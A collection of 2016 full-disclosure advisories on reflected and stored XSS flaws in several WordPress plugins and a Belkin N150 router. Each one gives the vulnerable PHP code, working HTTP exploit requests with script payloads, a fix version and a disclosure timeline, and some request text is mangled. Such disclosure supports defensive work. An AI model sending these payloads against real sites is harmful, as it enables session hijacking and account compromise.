Persian-woocommerce-sms XSS Vulnerability

## FULL DISCLOSURE

#Product :Persian-woocommerce-sms
#Exploit Author : Rahul Pratap Singh
#Version :3.3.2
#Home page Link : https://wordpress.org/plugins/persian-woocommerce-sms/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 21/4/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“ps_sms_numbers”  parameter is not sanitized that leads to XSS Vulnerability.

—————————————-
Vulnerable Code:
—————————————-

File Name: testfiles/persian-woocommerce-sms/lib/class.bulk.send.php
Found at line:45
value=”<?php echo isset($_POST[‘ps_sms_numbers’]) ? $_POST[‘ps_sms_numbers’] : ” ?>” style=”direction:ltr; text-align:left; width:700px; max-width:100% !important”/><br/>

—————————————-

Fix:
Update to 3.3.4

Vulnerability Disclosure Timeline:
→ March 14, 2016  – Bug discovered, initial report to Vendor.
→ March 22, 2016  – No Response. Report sent again.
→ March 23, 2016  – WordPress Acknowledged.
→ April 21, 2016  – Full Disclosure.

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/persian-woocommerce-sms/changelog/

Soundy Background Music XSS Vulnerability

## FULL DISCLOSURE

#Product : Soundy Background Music
#Exploit Author : Rahul Pratap Singh
#Version : 3.1
#Home page Link : https://wordpress.org/plugins/soundy-background-music/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 12/3/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“war_soundy_audio_volume” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-

soundy.php
1462-1473
if( $audio_volume_def == ‘default’ )
{
$audio_volume = ‘default’;
}
else
{
$audio_volume = $_POST[ ‘war_soundy_audio_volume’ ];
}
update_post_meta( $post_id,
                 ‘war_soundy_audio_volume’,
                 $audio_volume );

—————————————-
POC:
—————————————-
Soundy_Background_Music_XSS

Fix:
Update to 3.2

Vulnerability Disclosure Timeline:
→ March  3, 2016  – Bug discovered, initial report to WordPress
→ March  7, 2016  – No response, Report sent again.
→ March  8, 2016  – WordPress response, plugin taken down
→ March 10, 2016  – Vendor deployed a patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/soundy-background-music/changelog/

DW Question Answer XSS Vulnerability

## FULL DISCLOSURE

#Product : DW Question Answer
#Exploit Author : Rahul Pratap Singh
#Version : 1.4.2.2
#Home page Link : https://wordpress.org/plugins/dw-question-answer/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 11/3/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“_dwqa_anonymous_name” parameter is not sanitized that leads to Stored XSS.

—————————————-
Vulnerable Code:
—————————————-

User.php
function dwqa_get_author( $post_id = false ) {
if ( !$post_id ) {
$post_id = get_the_ID();
}
$display_name = false;
if ( dwqa_is_anonymous( $post_id ) ) {
$anonymous_name = get_post_meta( $post_id, ‘_dwqa_anonymous_name’, true );
if ( $anonymous_name ) {
$display_name = $anonymous_name;
} else {
$display_name = __( ‘Anonymous’, ‘dwqa’ );
}
} else {
$user_id = get_post_field( ‘post_author’, $post_id );
$display_name = get_the_author_meta( ‘display_name’, $user_id );
}
return apply_filters( ‘dwqa_get_author’, $display_name, $post_id );
}

—————————————-
Exploit:
—————————————-

POST /index.php/dwqa-ask-question/ HTTP/1.1

question-title=abc&question-content=%3Cp%3Eabc%3C%2Fp%3E&question-category=2&question-tag=abc&_dwqa_anonymous_email=
abc%40gmail.com&_dwqa_anonymous_name=%22%3E%3Cimg+src%3Dx+
onerror%3Dalert%281%29%3E%3C%21–&_wpnonce=
3164a8f439&_wp_http_referer=%2Fwp442%2Findex.php%2Fdwqa-ask-question%2F&dwqa-question-submit=Submit

—————————————-
POC:
—————————————-
DWQA_Stored_XSS

Fix:
Update to 1.4.2.3

Vulnerability Disclosure Timeline:
→ March  3, 2016  – Bug discovered, initial report to WordPress
→ March  7, 2016  – No response, Report sent again.
→ March  8, 2016  – WordPress response, plugin taken down
→ March 11, 2016  – Vendor deployed a patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/dw-question-answer/changelog/

Belkin N150 Router Multiple XSS Vulnerabilities

## FULL DISCLOSURE

#Product : Belkin N150 Home Router
#Exploit Author : Rahul Pratap Singh
#Home page Link : http://www.belkin.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Version : F9K1009 v1
#Firmware : 1.00.09
#Date : 24/Feb/2016

→ Vulnerability/BUG Report :

—————————————-
Description:
—————————————-
Belkin N150 Home router is vulnerable to XSS vulnerability. Numerous parameters are not sanitized that leads to XSS.

—————————————-
Vulnerable Code:
—————————————-
belkinsessionxssvulcode

belkinxsspocvulcode

vul8

—————————————-
Exploit and Poc:
—————————————-
1)
GET /cgi-bin/webproc?getpage=html/top.html&var:page=deviceinfo HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/index.html&var:page=deviceinfo
Cookie: sessionid=”></a><img src=x onerror=alert(1)><a; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us
Connection: keep-alive

belkinsessionxsspoc

2)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 222

getpage=html%2Fpage.html&errorpage=< script>alert(“xss”)< /script>&var%3Apage=deviceinfo&var%3A errorpage=login&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=eHNz&%3Ahostname=dGVjaG5v&%3A action=login&%3Asessionid=3921960f

belkinxsspoc2

3)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

getpage=html/page.html&errorpage=html/page.html&var:page=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>& var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f

belkinxsspoc3

4)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 245getpage=html/page.html&errorpage=html/page.html&var:page=deviceinfo&var:errorpage= “< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960fbelkinxsspoc45)
GET /cgi-bin/webproc?getpage=< scRipt>prompt(“xss”)< /scRipt>&var:getpage=abc&var:language=en_us&var:page=login&var:oldpage =ut_firmware HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

belkinxsspoc5

6)
GET /cgi-bin/webproc?getpage=html/page.html&var:menu=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

belkinxsspoc6

7)
GET /cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>& var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&amp; var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

belkinxsspoc7

8)
GET /cgi-bin/webproc?getpage=html/page.html&var:tbsversion=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

belkinxsspoc8

9)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 262

getpage=html/page.html&errorpage=html/page.html&var:CacheLastData=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>& var:page=abc&var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f

belkinxsspoc9

10)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=392Multiple XSS Vulnerabilities1960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 262

getpage=html/page.html&errorpage=html/page.html&var:sys_UserLevel=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>& var:page=abc&var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f

belkinxsspoc10

11)
GET /cgi-bin/webproc?getpage=html/page.html&var:style=”< /scRipt>< scRipt>prompt(“xss”)< /scRipt>< scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

belkinxsspoc11

Vulnerability Disclosure Timeline:
→ January 30, 2016     – Bug discovered, initial report to Belkin Security Team
→ February 24, 2016  – No response from vendor
→ February 24, 2016  – Full Disclosure

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

Import Woocommerce XSS Vulnerability

## FULL DISCLOSURE

#Product : Import Woocommerce
#Exploit Author : Rahul Pratap Singh
#Version : 1.0.1
#Home page Link : https://wordpress.org/plugins/import-woocommerce/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 24/Feb/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“alertmsg” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File: index.php
Line:229-232

function translate_alertstr(){
if(isset($_POST[‘alertmsg’]))
echo __($_POST[‘alertmsg’],’import-woocommerce’);

die();

—————————————-
Exploit:
—————————————-
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

action=translate_alertstr&alertmsg=”><img src=x onerror=alert(1)>

—————————————-
POC:
—————————————-
import-woocommercexsspoc

Fix:
Update to 1.1

Vulnerability Disclosure Timeline:
→ January 30, 2016     – Bug discovered, initial report to WordPress
→ February 1, 2016     – WordPress response, plugin taken down
→ February 24, 2016  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/import-woocommerce/changelog/

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

WP Ultimate Exporter XSS Vulnerability

## FULL DISCLOSURE

#Product : WP Ultimate Exporter
#Exploit Author : Rahul Pratap Singh
#Version : 1.0
#Home page Link : https://wordpress.org/plugins/wp-ultimate-exporter/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 24/Feb/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“export_name” and “export_post_type_name” parameters are not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: /wp-ultimate-exporter/includes/WUExporterUI.php

Found at line:88
$export_post_type = isset($_REQUEST[‘export_name’]) ? $_REQUEST[‘export_name’] : ” ;

Found at line:89
$custom_post = isset($_REQUEST[‘export_post_type_name’]) ? $_REQUEST[‘export_post_type_name’] : ” ;?>

Found at line:91

<input type =”hidden” value = ‘<?php echo $export_post_type?>’ name=’export_type_name’>

Found at line:92

<input type =”hidden” value = ‘<?php echo $custom_post?>’ name=’export_custompost_type’>

—————————————-
Exploit:
—————————————-
POST /wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype

export_name=”/><input type=text onclick=alert(/XSS/)><!–”

POST /wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype

export_post_type_name=”/><input type=text onclick=alert(/XSS/)><!–”

—————————————-
POC:
—————————————-
wp-ultimate-exporter

wp-ultimate-exporter1

Vulnerability Disclosure Timeline:
→ January  30, 2016   – Bug discovered, initial report to WordPress
→ February 1,  2016   – WordPress response, plugin taken down
→ February 24, 2016 – Plugin up with same version

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

WP Advanced Importer XSS Vulnerability

## FULL DISCLOSURE

#Product : WP Advanced Importer
#Exploit Author : Rahul Pratap Singh
#Version : 2.1.1
#Home page Link : https://wordpress.org/plugins/wp-advanced-importer/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 23/Feb/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“alertmsg” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File: index.php

function trans_xmlalert_str(){
if(isset($_POST[‘alertmsg’]))
echo __($_POST[‘alertmsg’],’wp-advanced-importer’);

die();

—————————————-
Exploit:
—————————————-
POST wordpress/wp-admin/admin-ajax.php

action=trans_xmlalert_str&alertmsg=”><img src=x onerror=alert(1)>

—————————————-
POC:
—————————————-
wp-advanced-importerxsspoc

Fix:
Update to 2.2

Vulnerability Disclosure Timeline:
→ January    30, 2016  – Bug discovered, initial report to WordPress
→ February 1, 2016     –  WordPress response, plugin taken down
→ February 23, 2016   – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/wp-advanced-importer/changelog/

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

CSV Import XSS Vulnerability

## FULL DISCLOSURE

#Product : CSV Import
#Exploit Author : Rahul Pratap Singh
#Version : 1.0
#Home page Link : https://wordpress.org/plugins/csv-import/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 23/Feb/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“alertmsg” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: csv-import/index.php

Found at line:238

echo __($_POST[‘alertmsg’], ‘csv-import’);

—————————————-
Exploit:
—————————————-
POST /wp-admin/admin-ajax.php

action=trans_csvimp_alertstr&alertmsg=”><img src=x onerror=alert(1)>

—————————————-
POC:
—————————————-
csv-importxsspoc

Fix:
Update to 1.1

Vulnerability Disclosure Timeline:
→ January   30, 2016  – Bug discovered, initial report to WordPress
→ February 1, 2016    – WordPress response, plugin taken down
→ February 23, 2016  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/csv-import/changelog/

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

WP-Comment-Rating XSS Vulnerability

## FULL DISCLOSURE

#Product : wp-comment-rating
#Exploit Author : Rahul Pratap Singh
#Version : 1.5.0
#Home page Link : http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 30/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“tab” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: wpb_plugin_admin_page.php

line:194
$this->current_tab = isset( $_GET[‘tab’] ) ? $_GET[‘tab’] : ”;

line:553
$active_tab = $this->current_tab;

line:558
$active_tab = isset( $this->tabs[0] ) && empty( $active_tab ) ? $this->tabs[0]->
get_id() : $active_tab;

line:561
<div class=”wrap wrap-<?php echo $this->page_hook . ‘ active-tab-‘ .
$active_tab; ?>”>

—————————————-
Exploit:
—————————————-
GET /wp-admin/edit-comments.php?page=wpcommentrating&tab=”>
< input type=text onclick=alert(/XSS/)><!–

—————————————-
POC:
—————————————-
wpcommentratingxsspoc

Fix:
Update to 1.5.4

Vulnerability Disclosure Timeline:
→ January 24, 2015  – Bug discovered, initial report to Vendor
→ January 25, 2015  – Vendor Acknowledged
→ January 27, 2015  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710

RSS Post Importer XSS Vulnerability

## FULL DISCLOSURE

#Product : RSS Post Importer
#Exploit Author : Rahul Pratap Singh
#Version : 2.2.1
#Home page Link : https://wordpress.org/plugins/rss-post-importer/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 30/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“full text RSS feed api key” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Exploit:
—————————————-
1) Go to the following url.
http://localhost/wp-admin/options-general.php?page=rss_pi&version=2.2.1&type=premium

2) Paste the following payload in “full text RSS feed api key” input field.

” autofocus onclick=alert(/XSS/) ”

—————————————-
POC:
—————————————-
RSSFeedApiXSSPOC

Fix:
Update to 2.2.3

Vulnerability Disclosure Timeline:
→ January 18, 2015  – Bug discovered, initial report to WordPress
→ January 19, 2015  – WordPress Response, plugin taken down
→ January 27, 2015  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/rss-post-importer/changelog/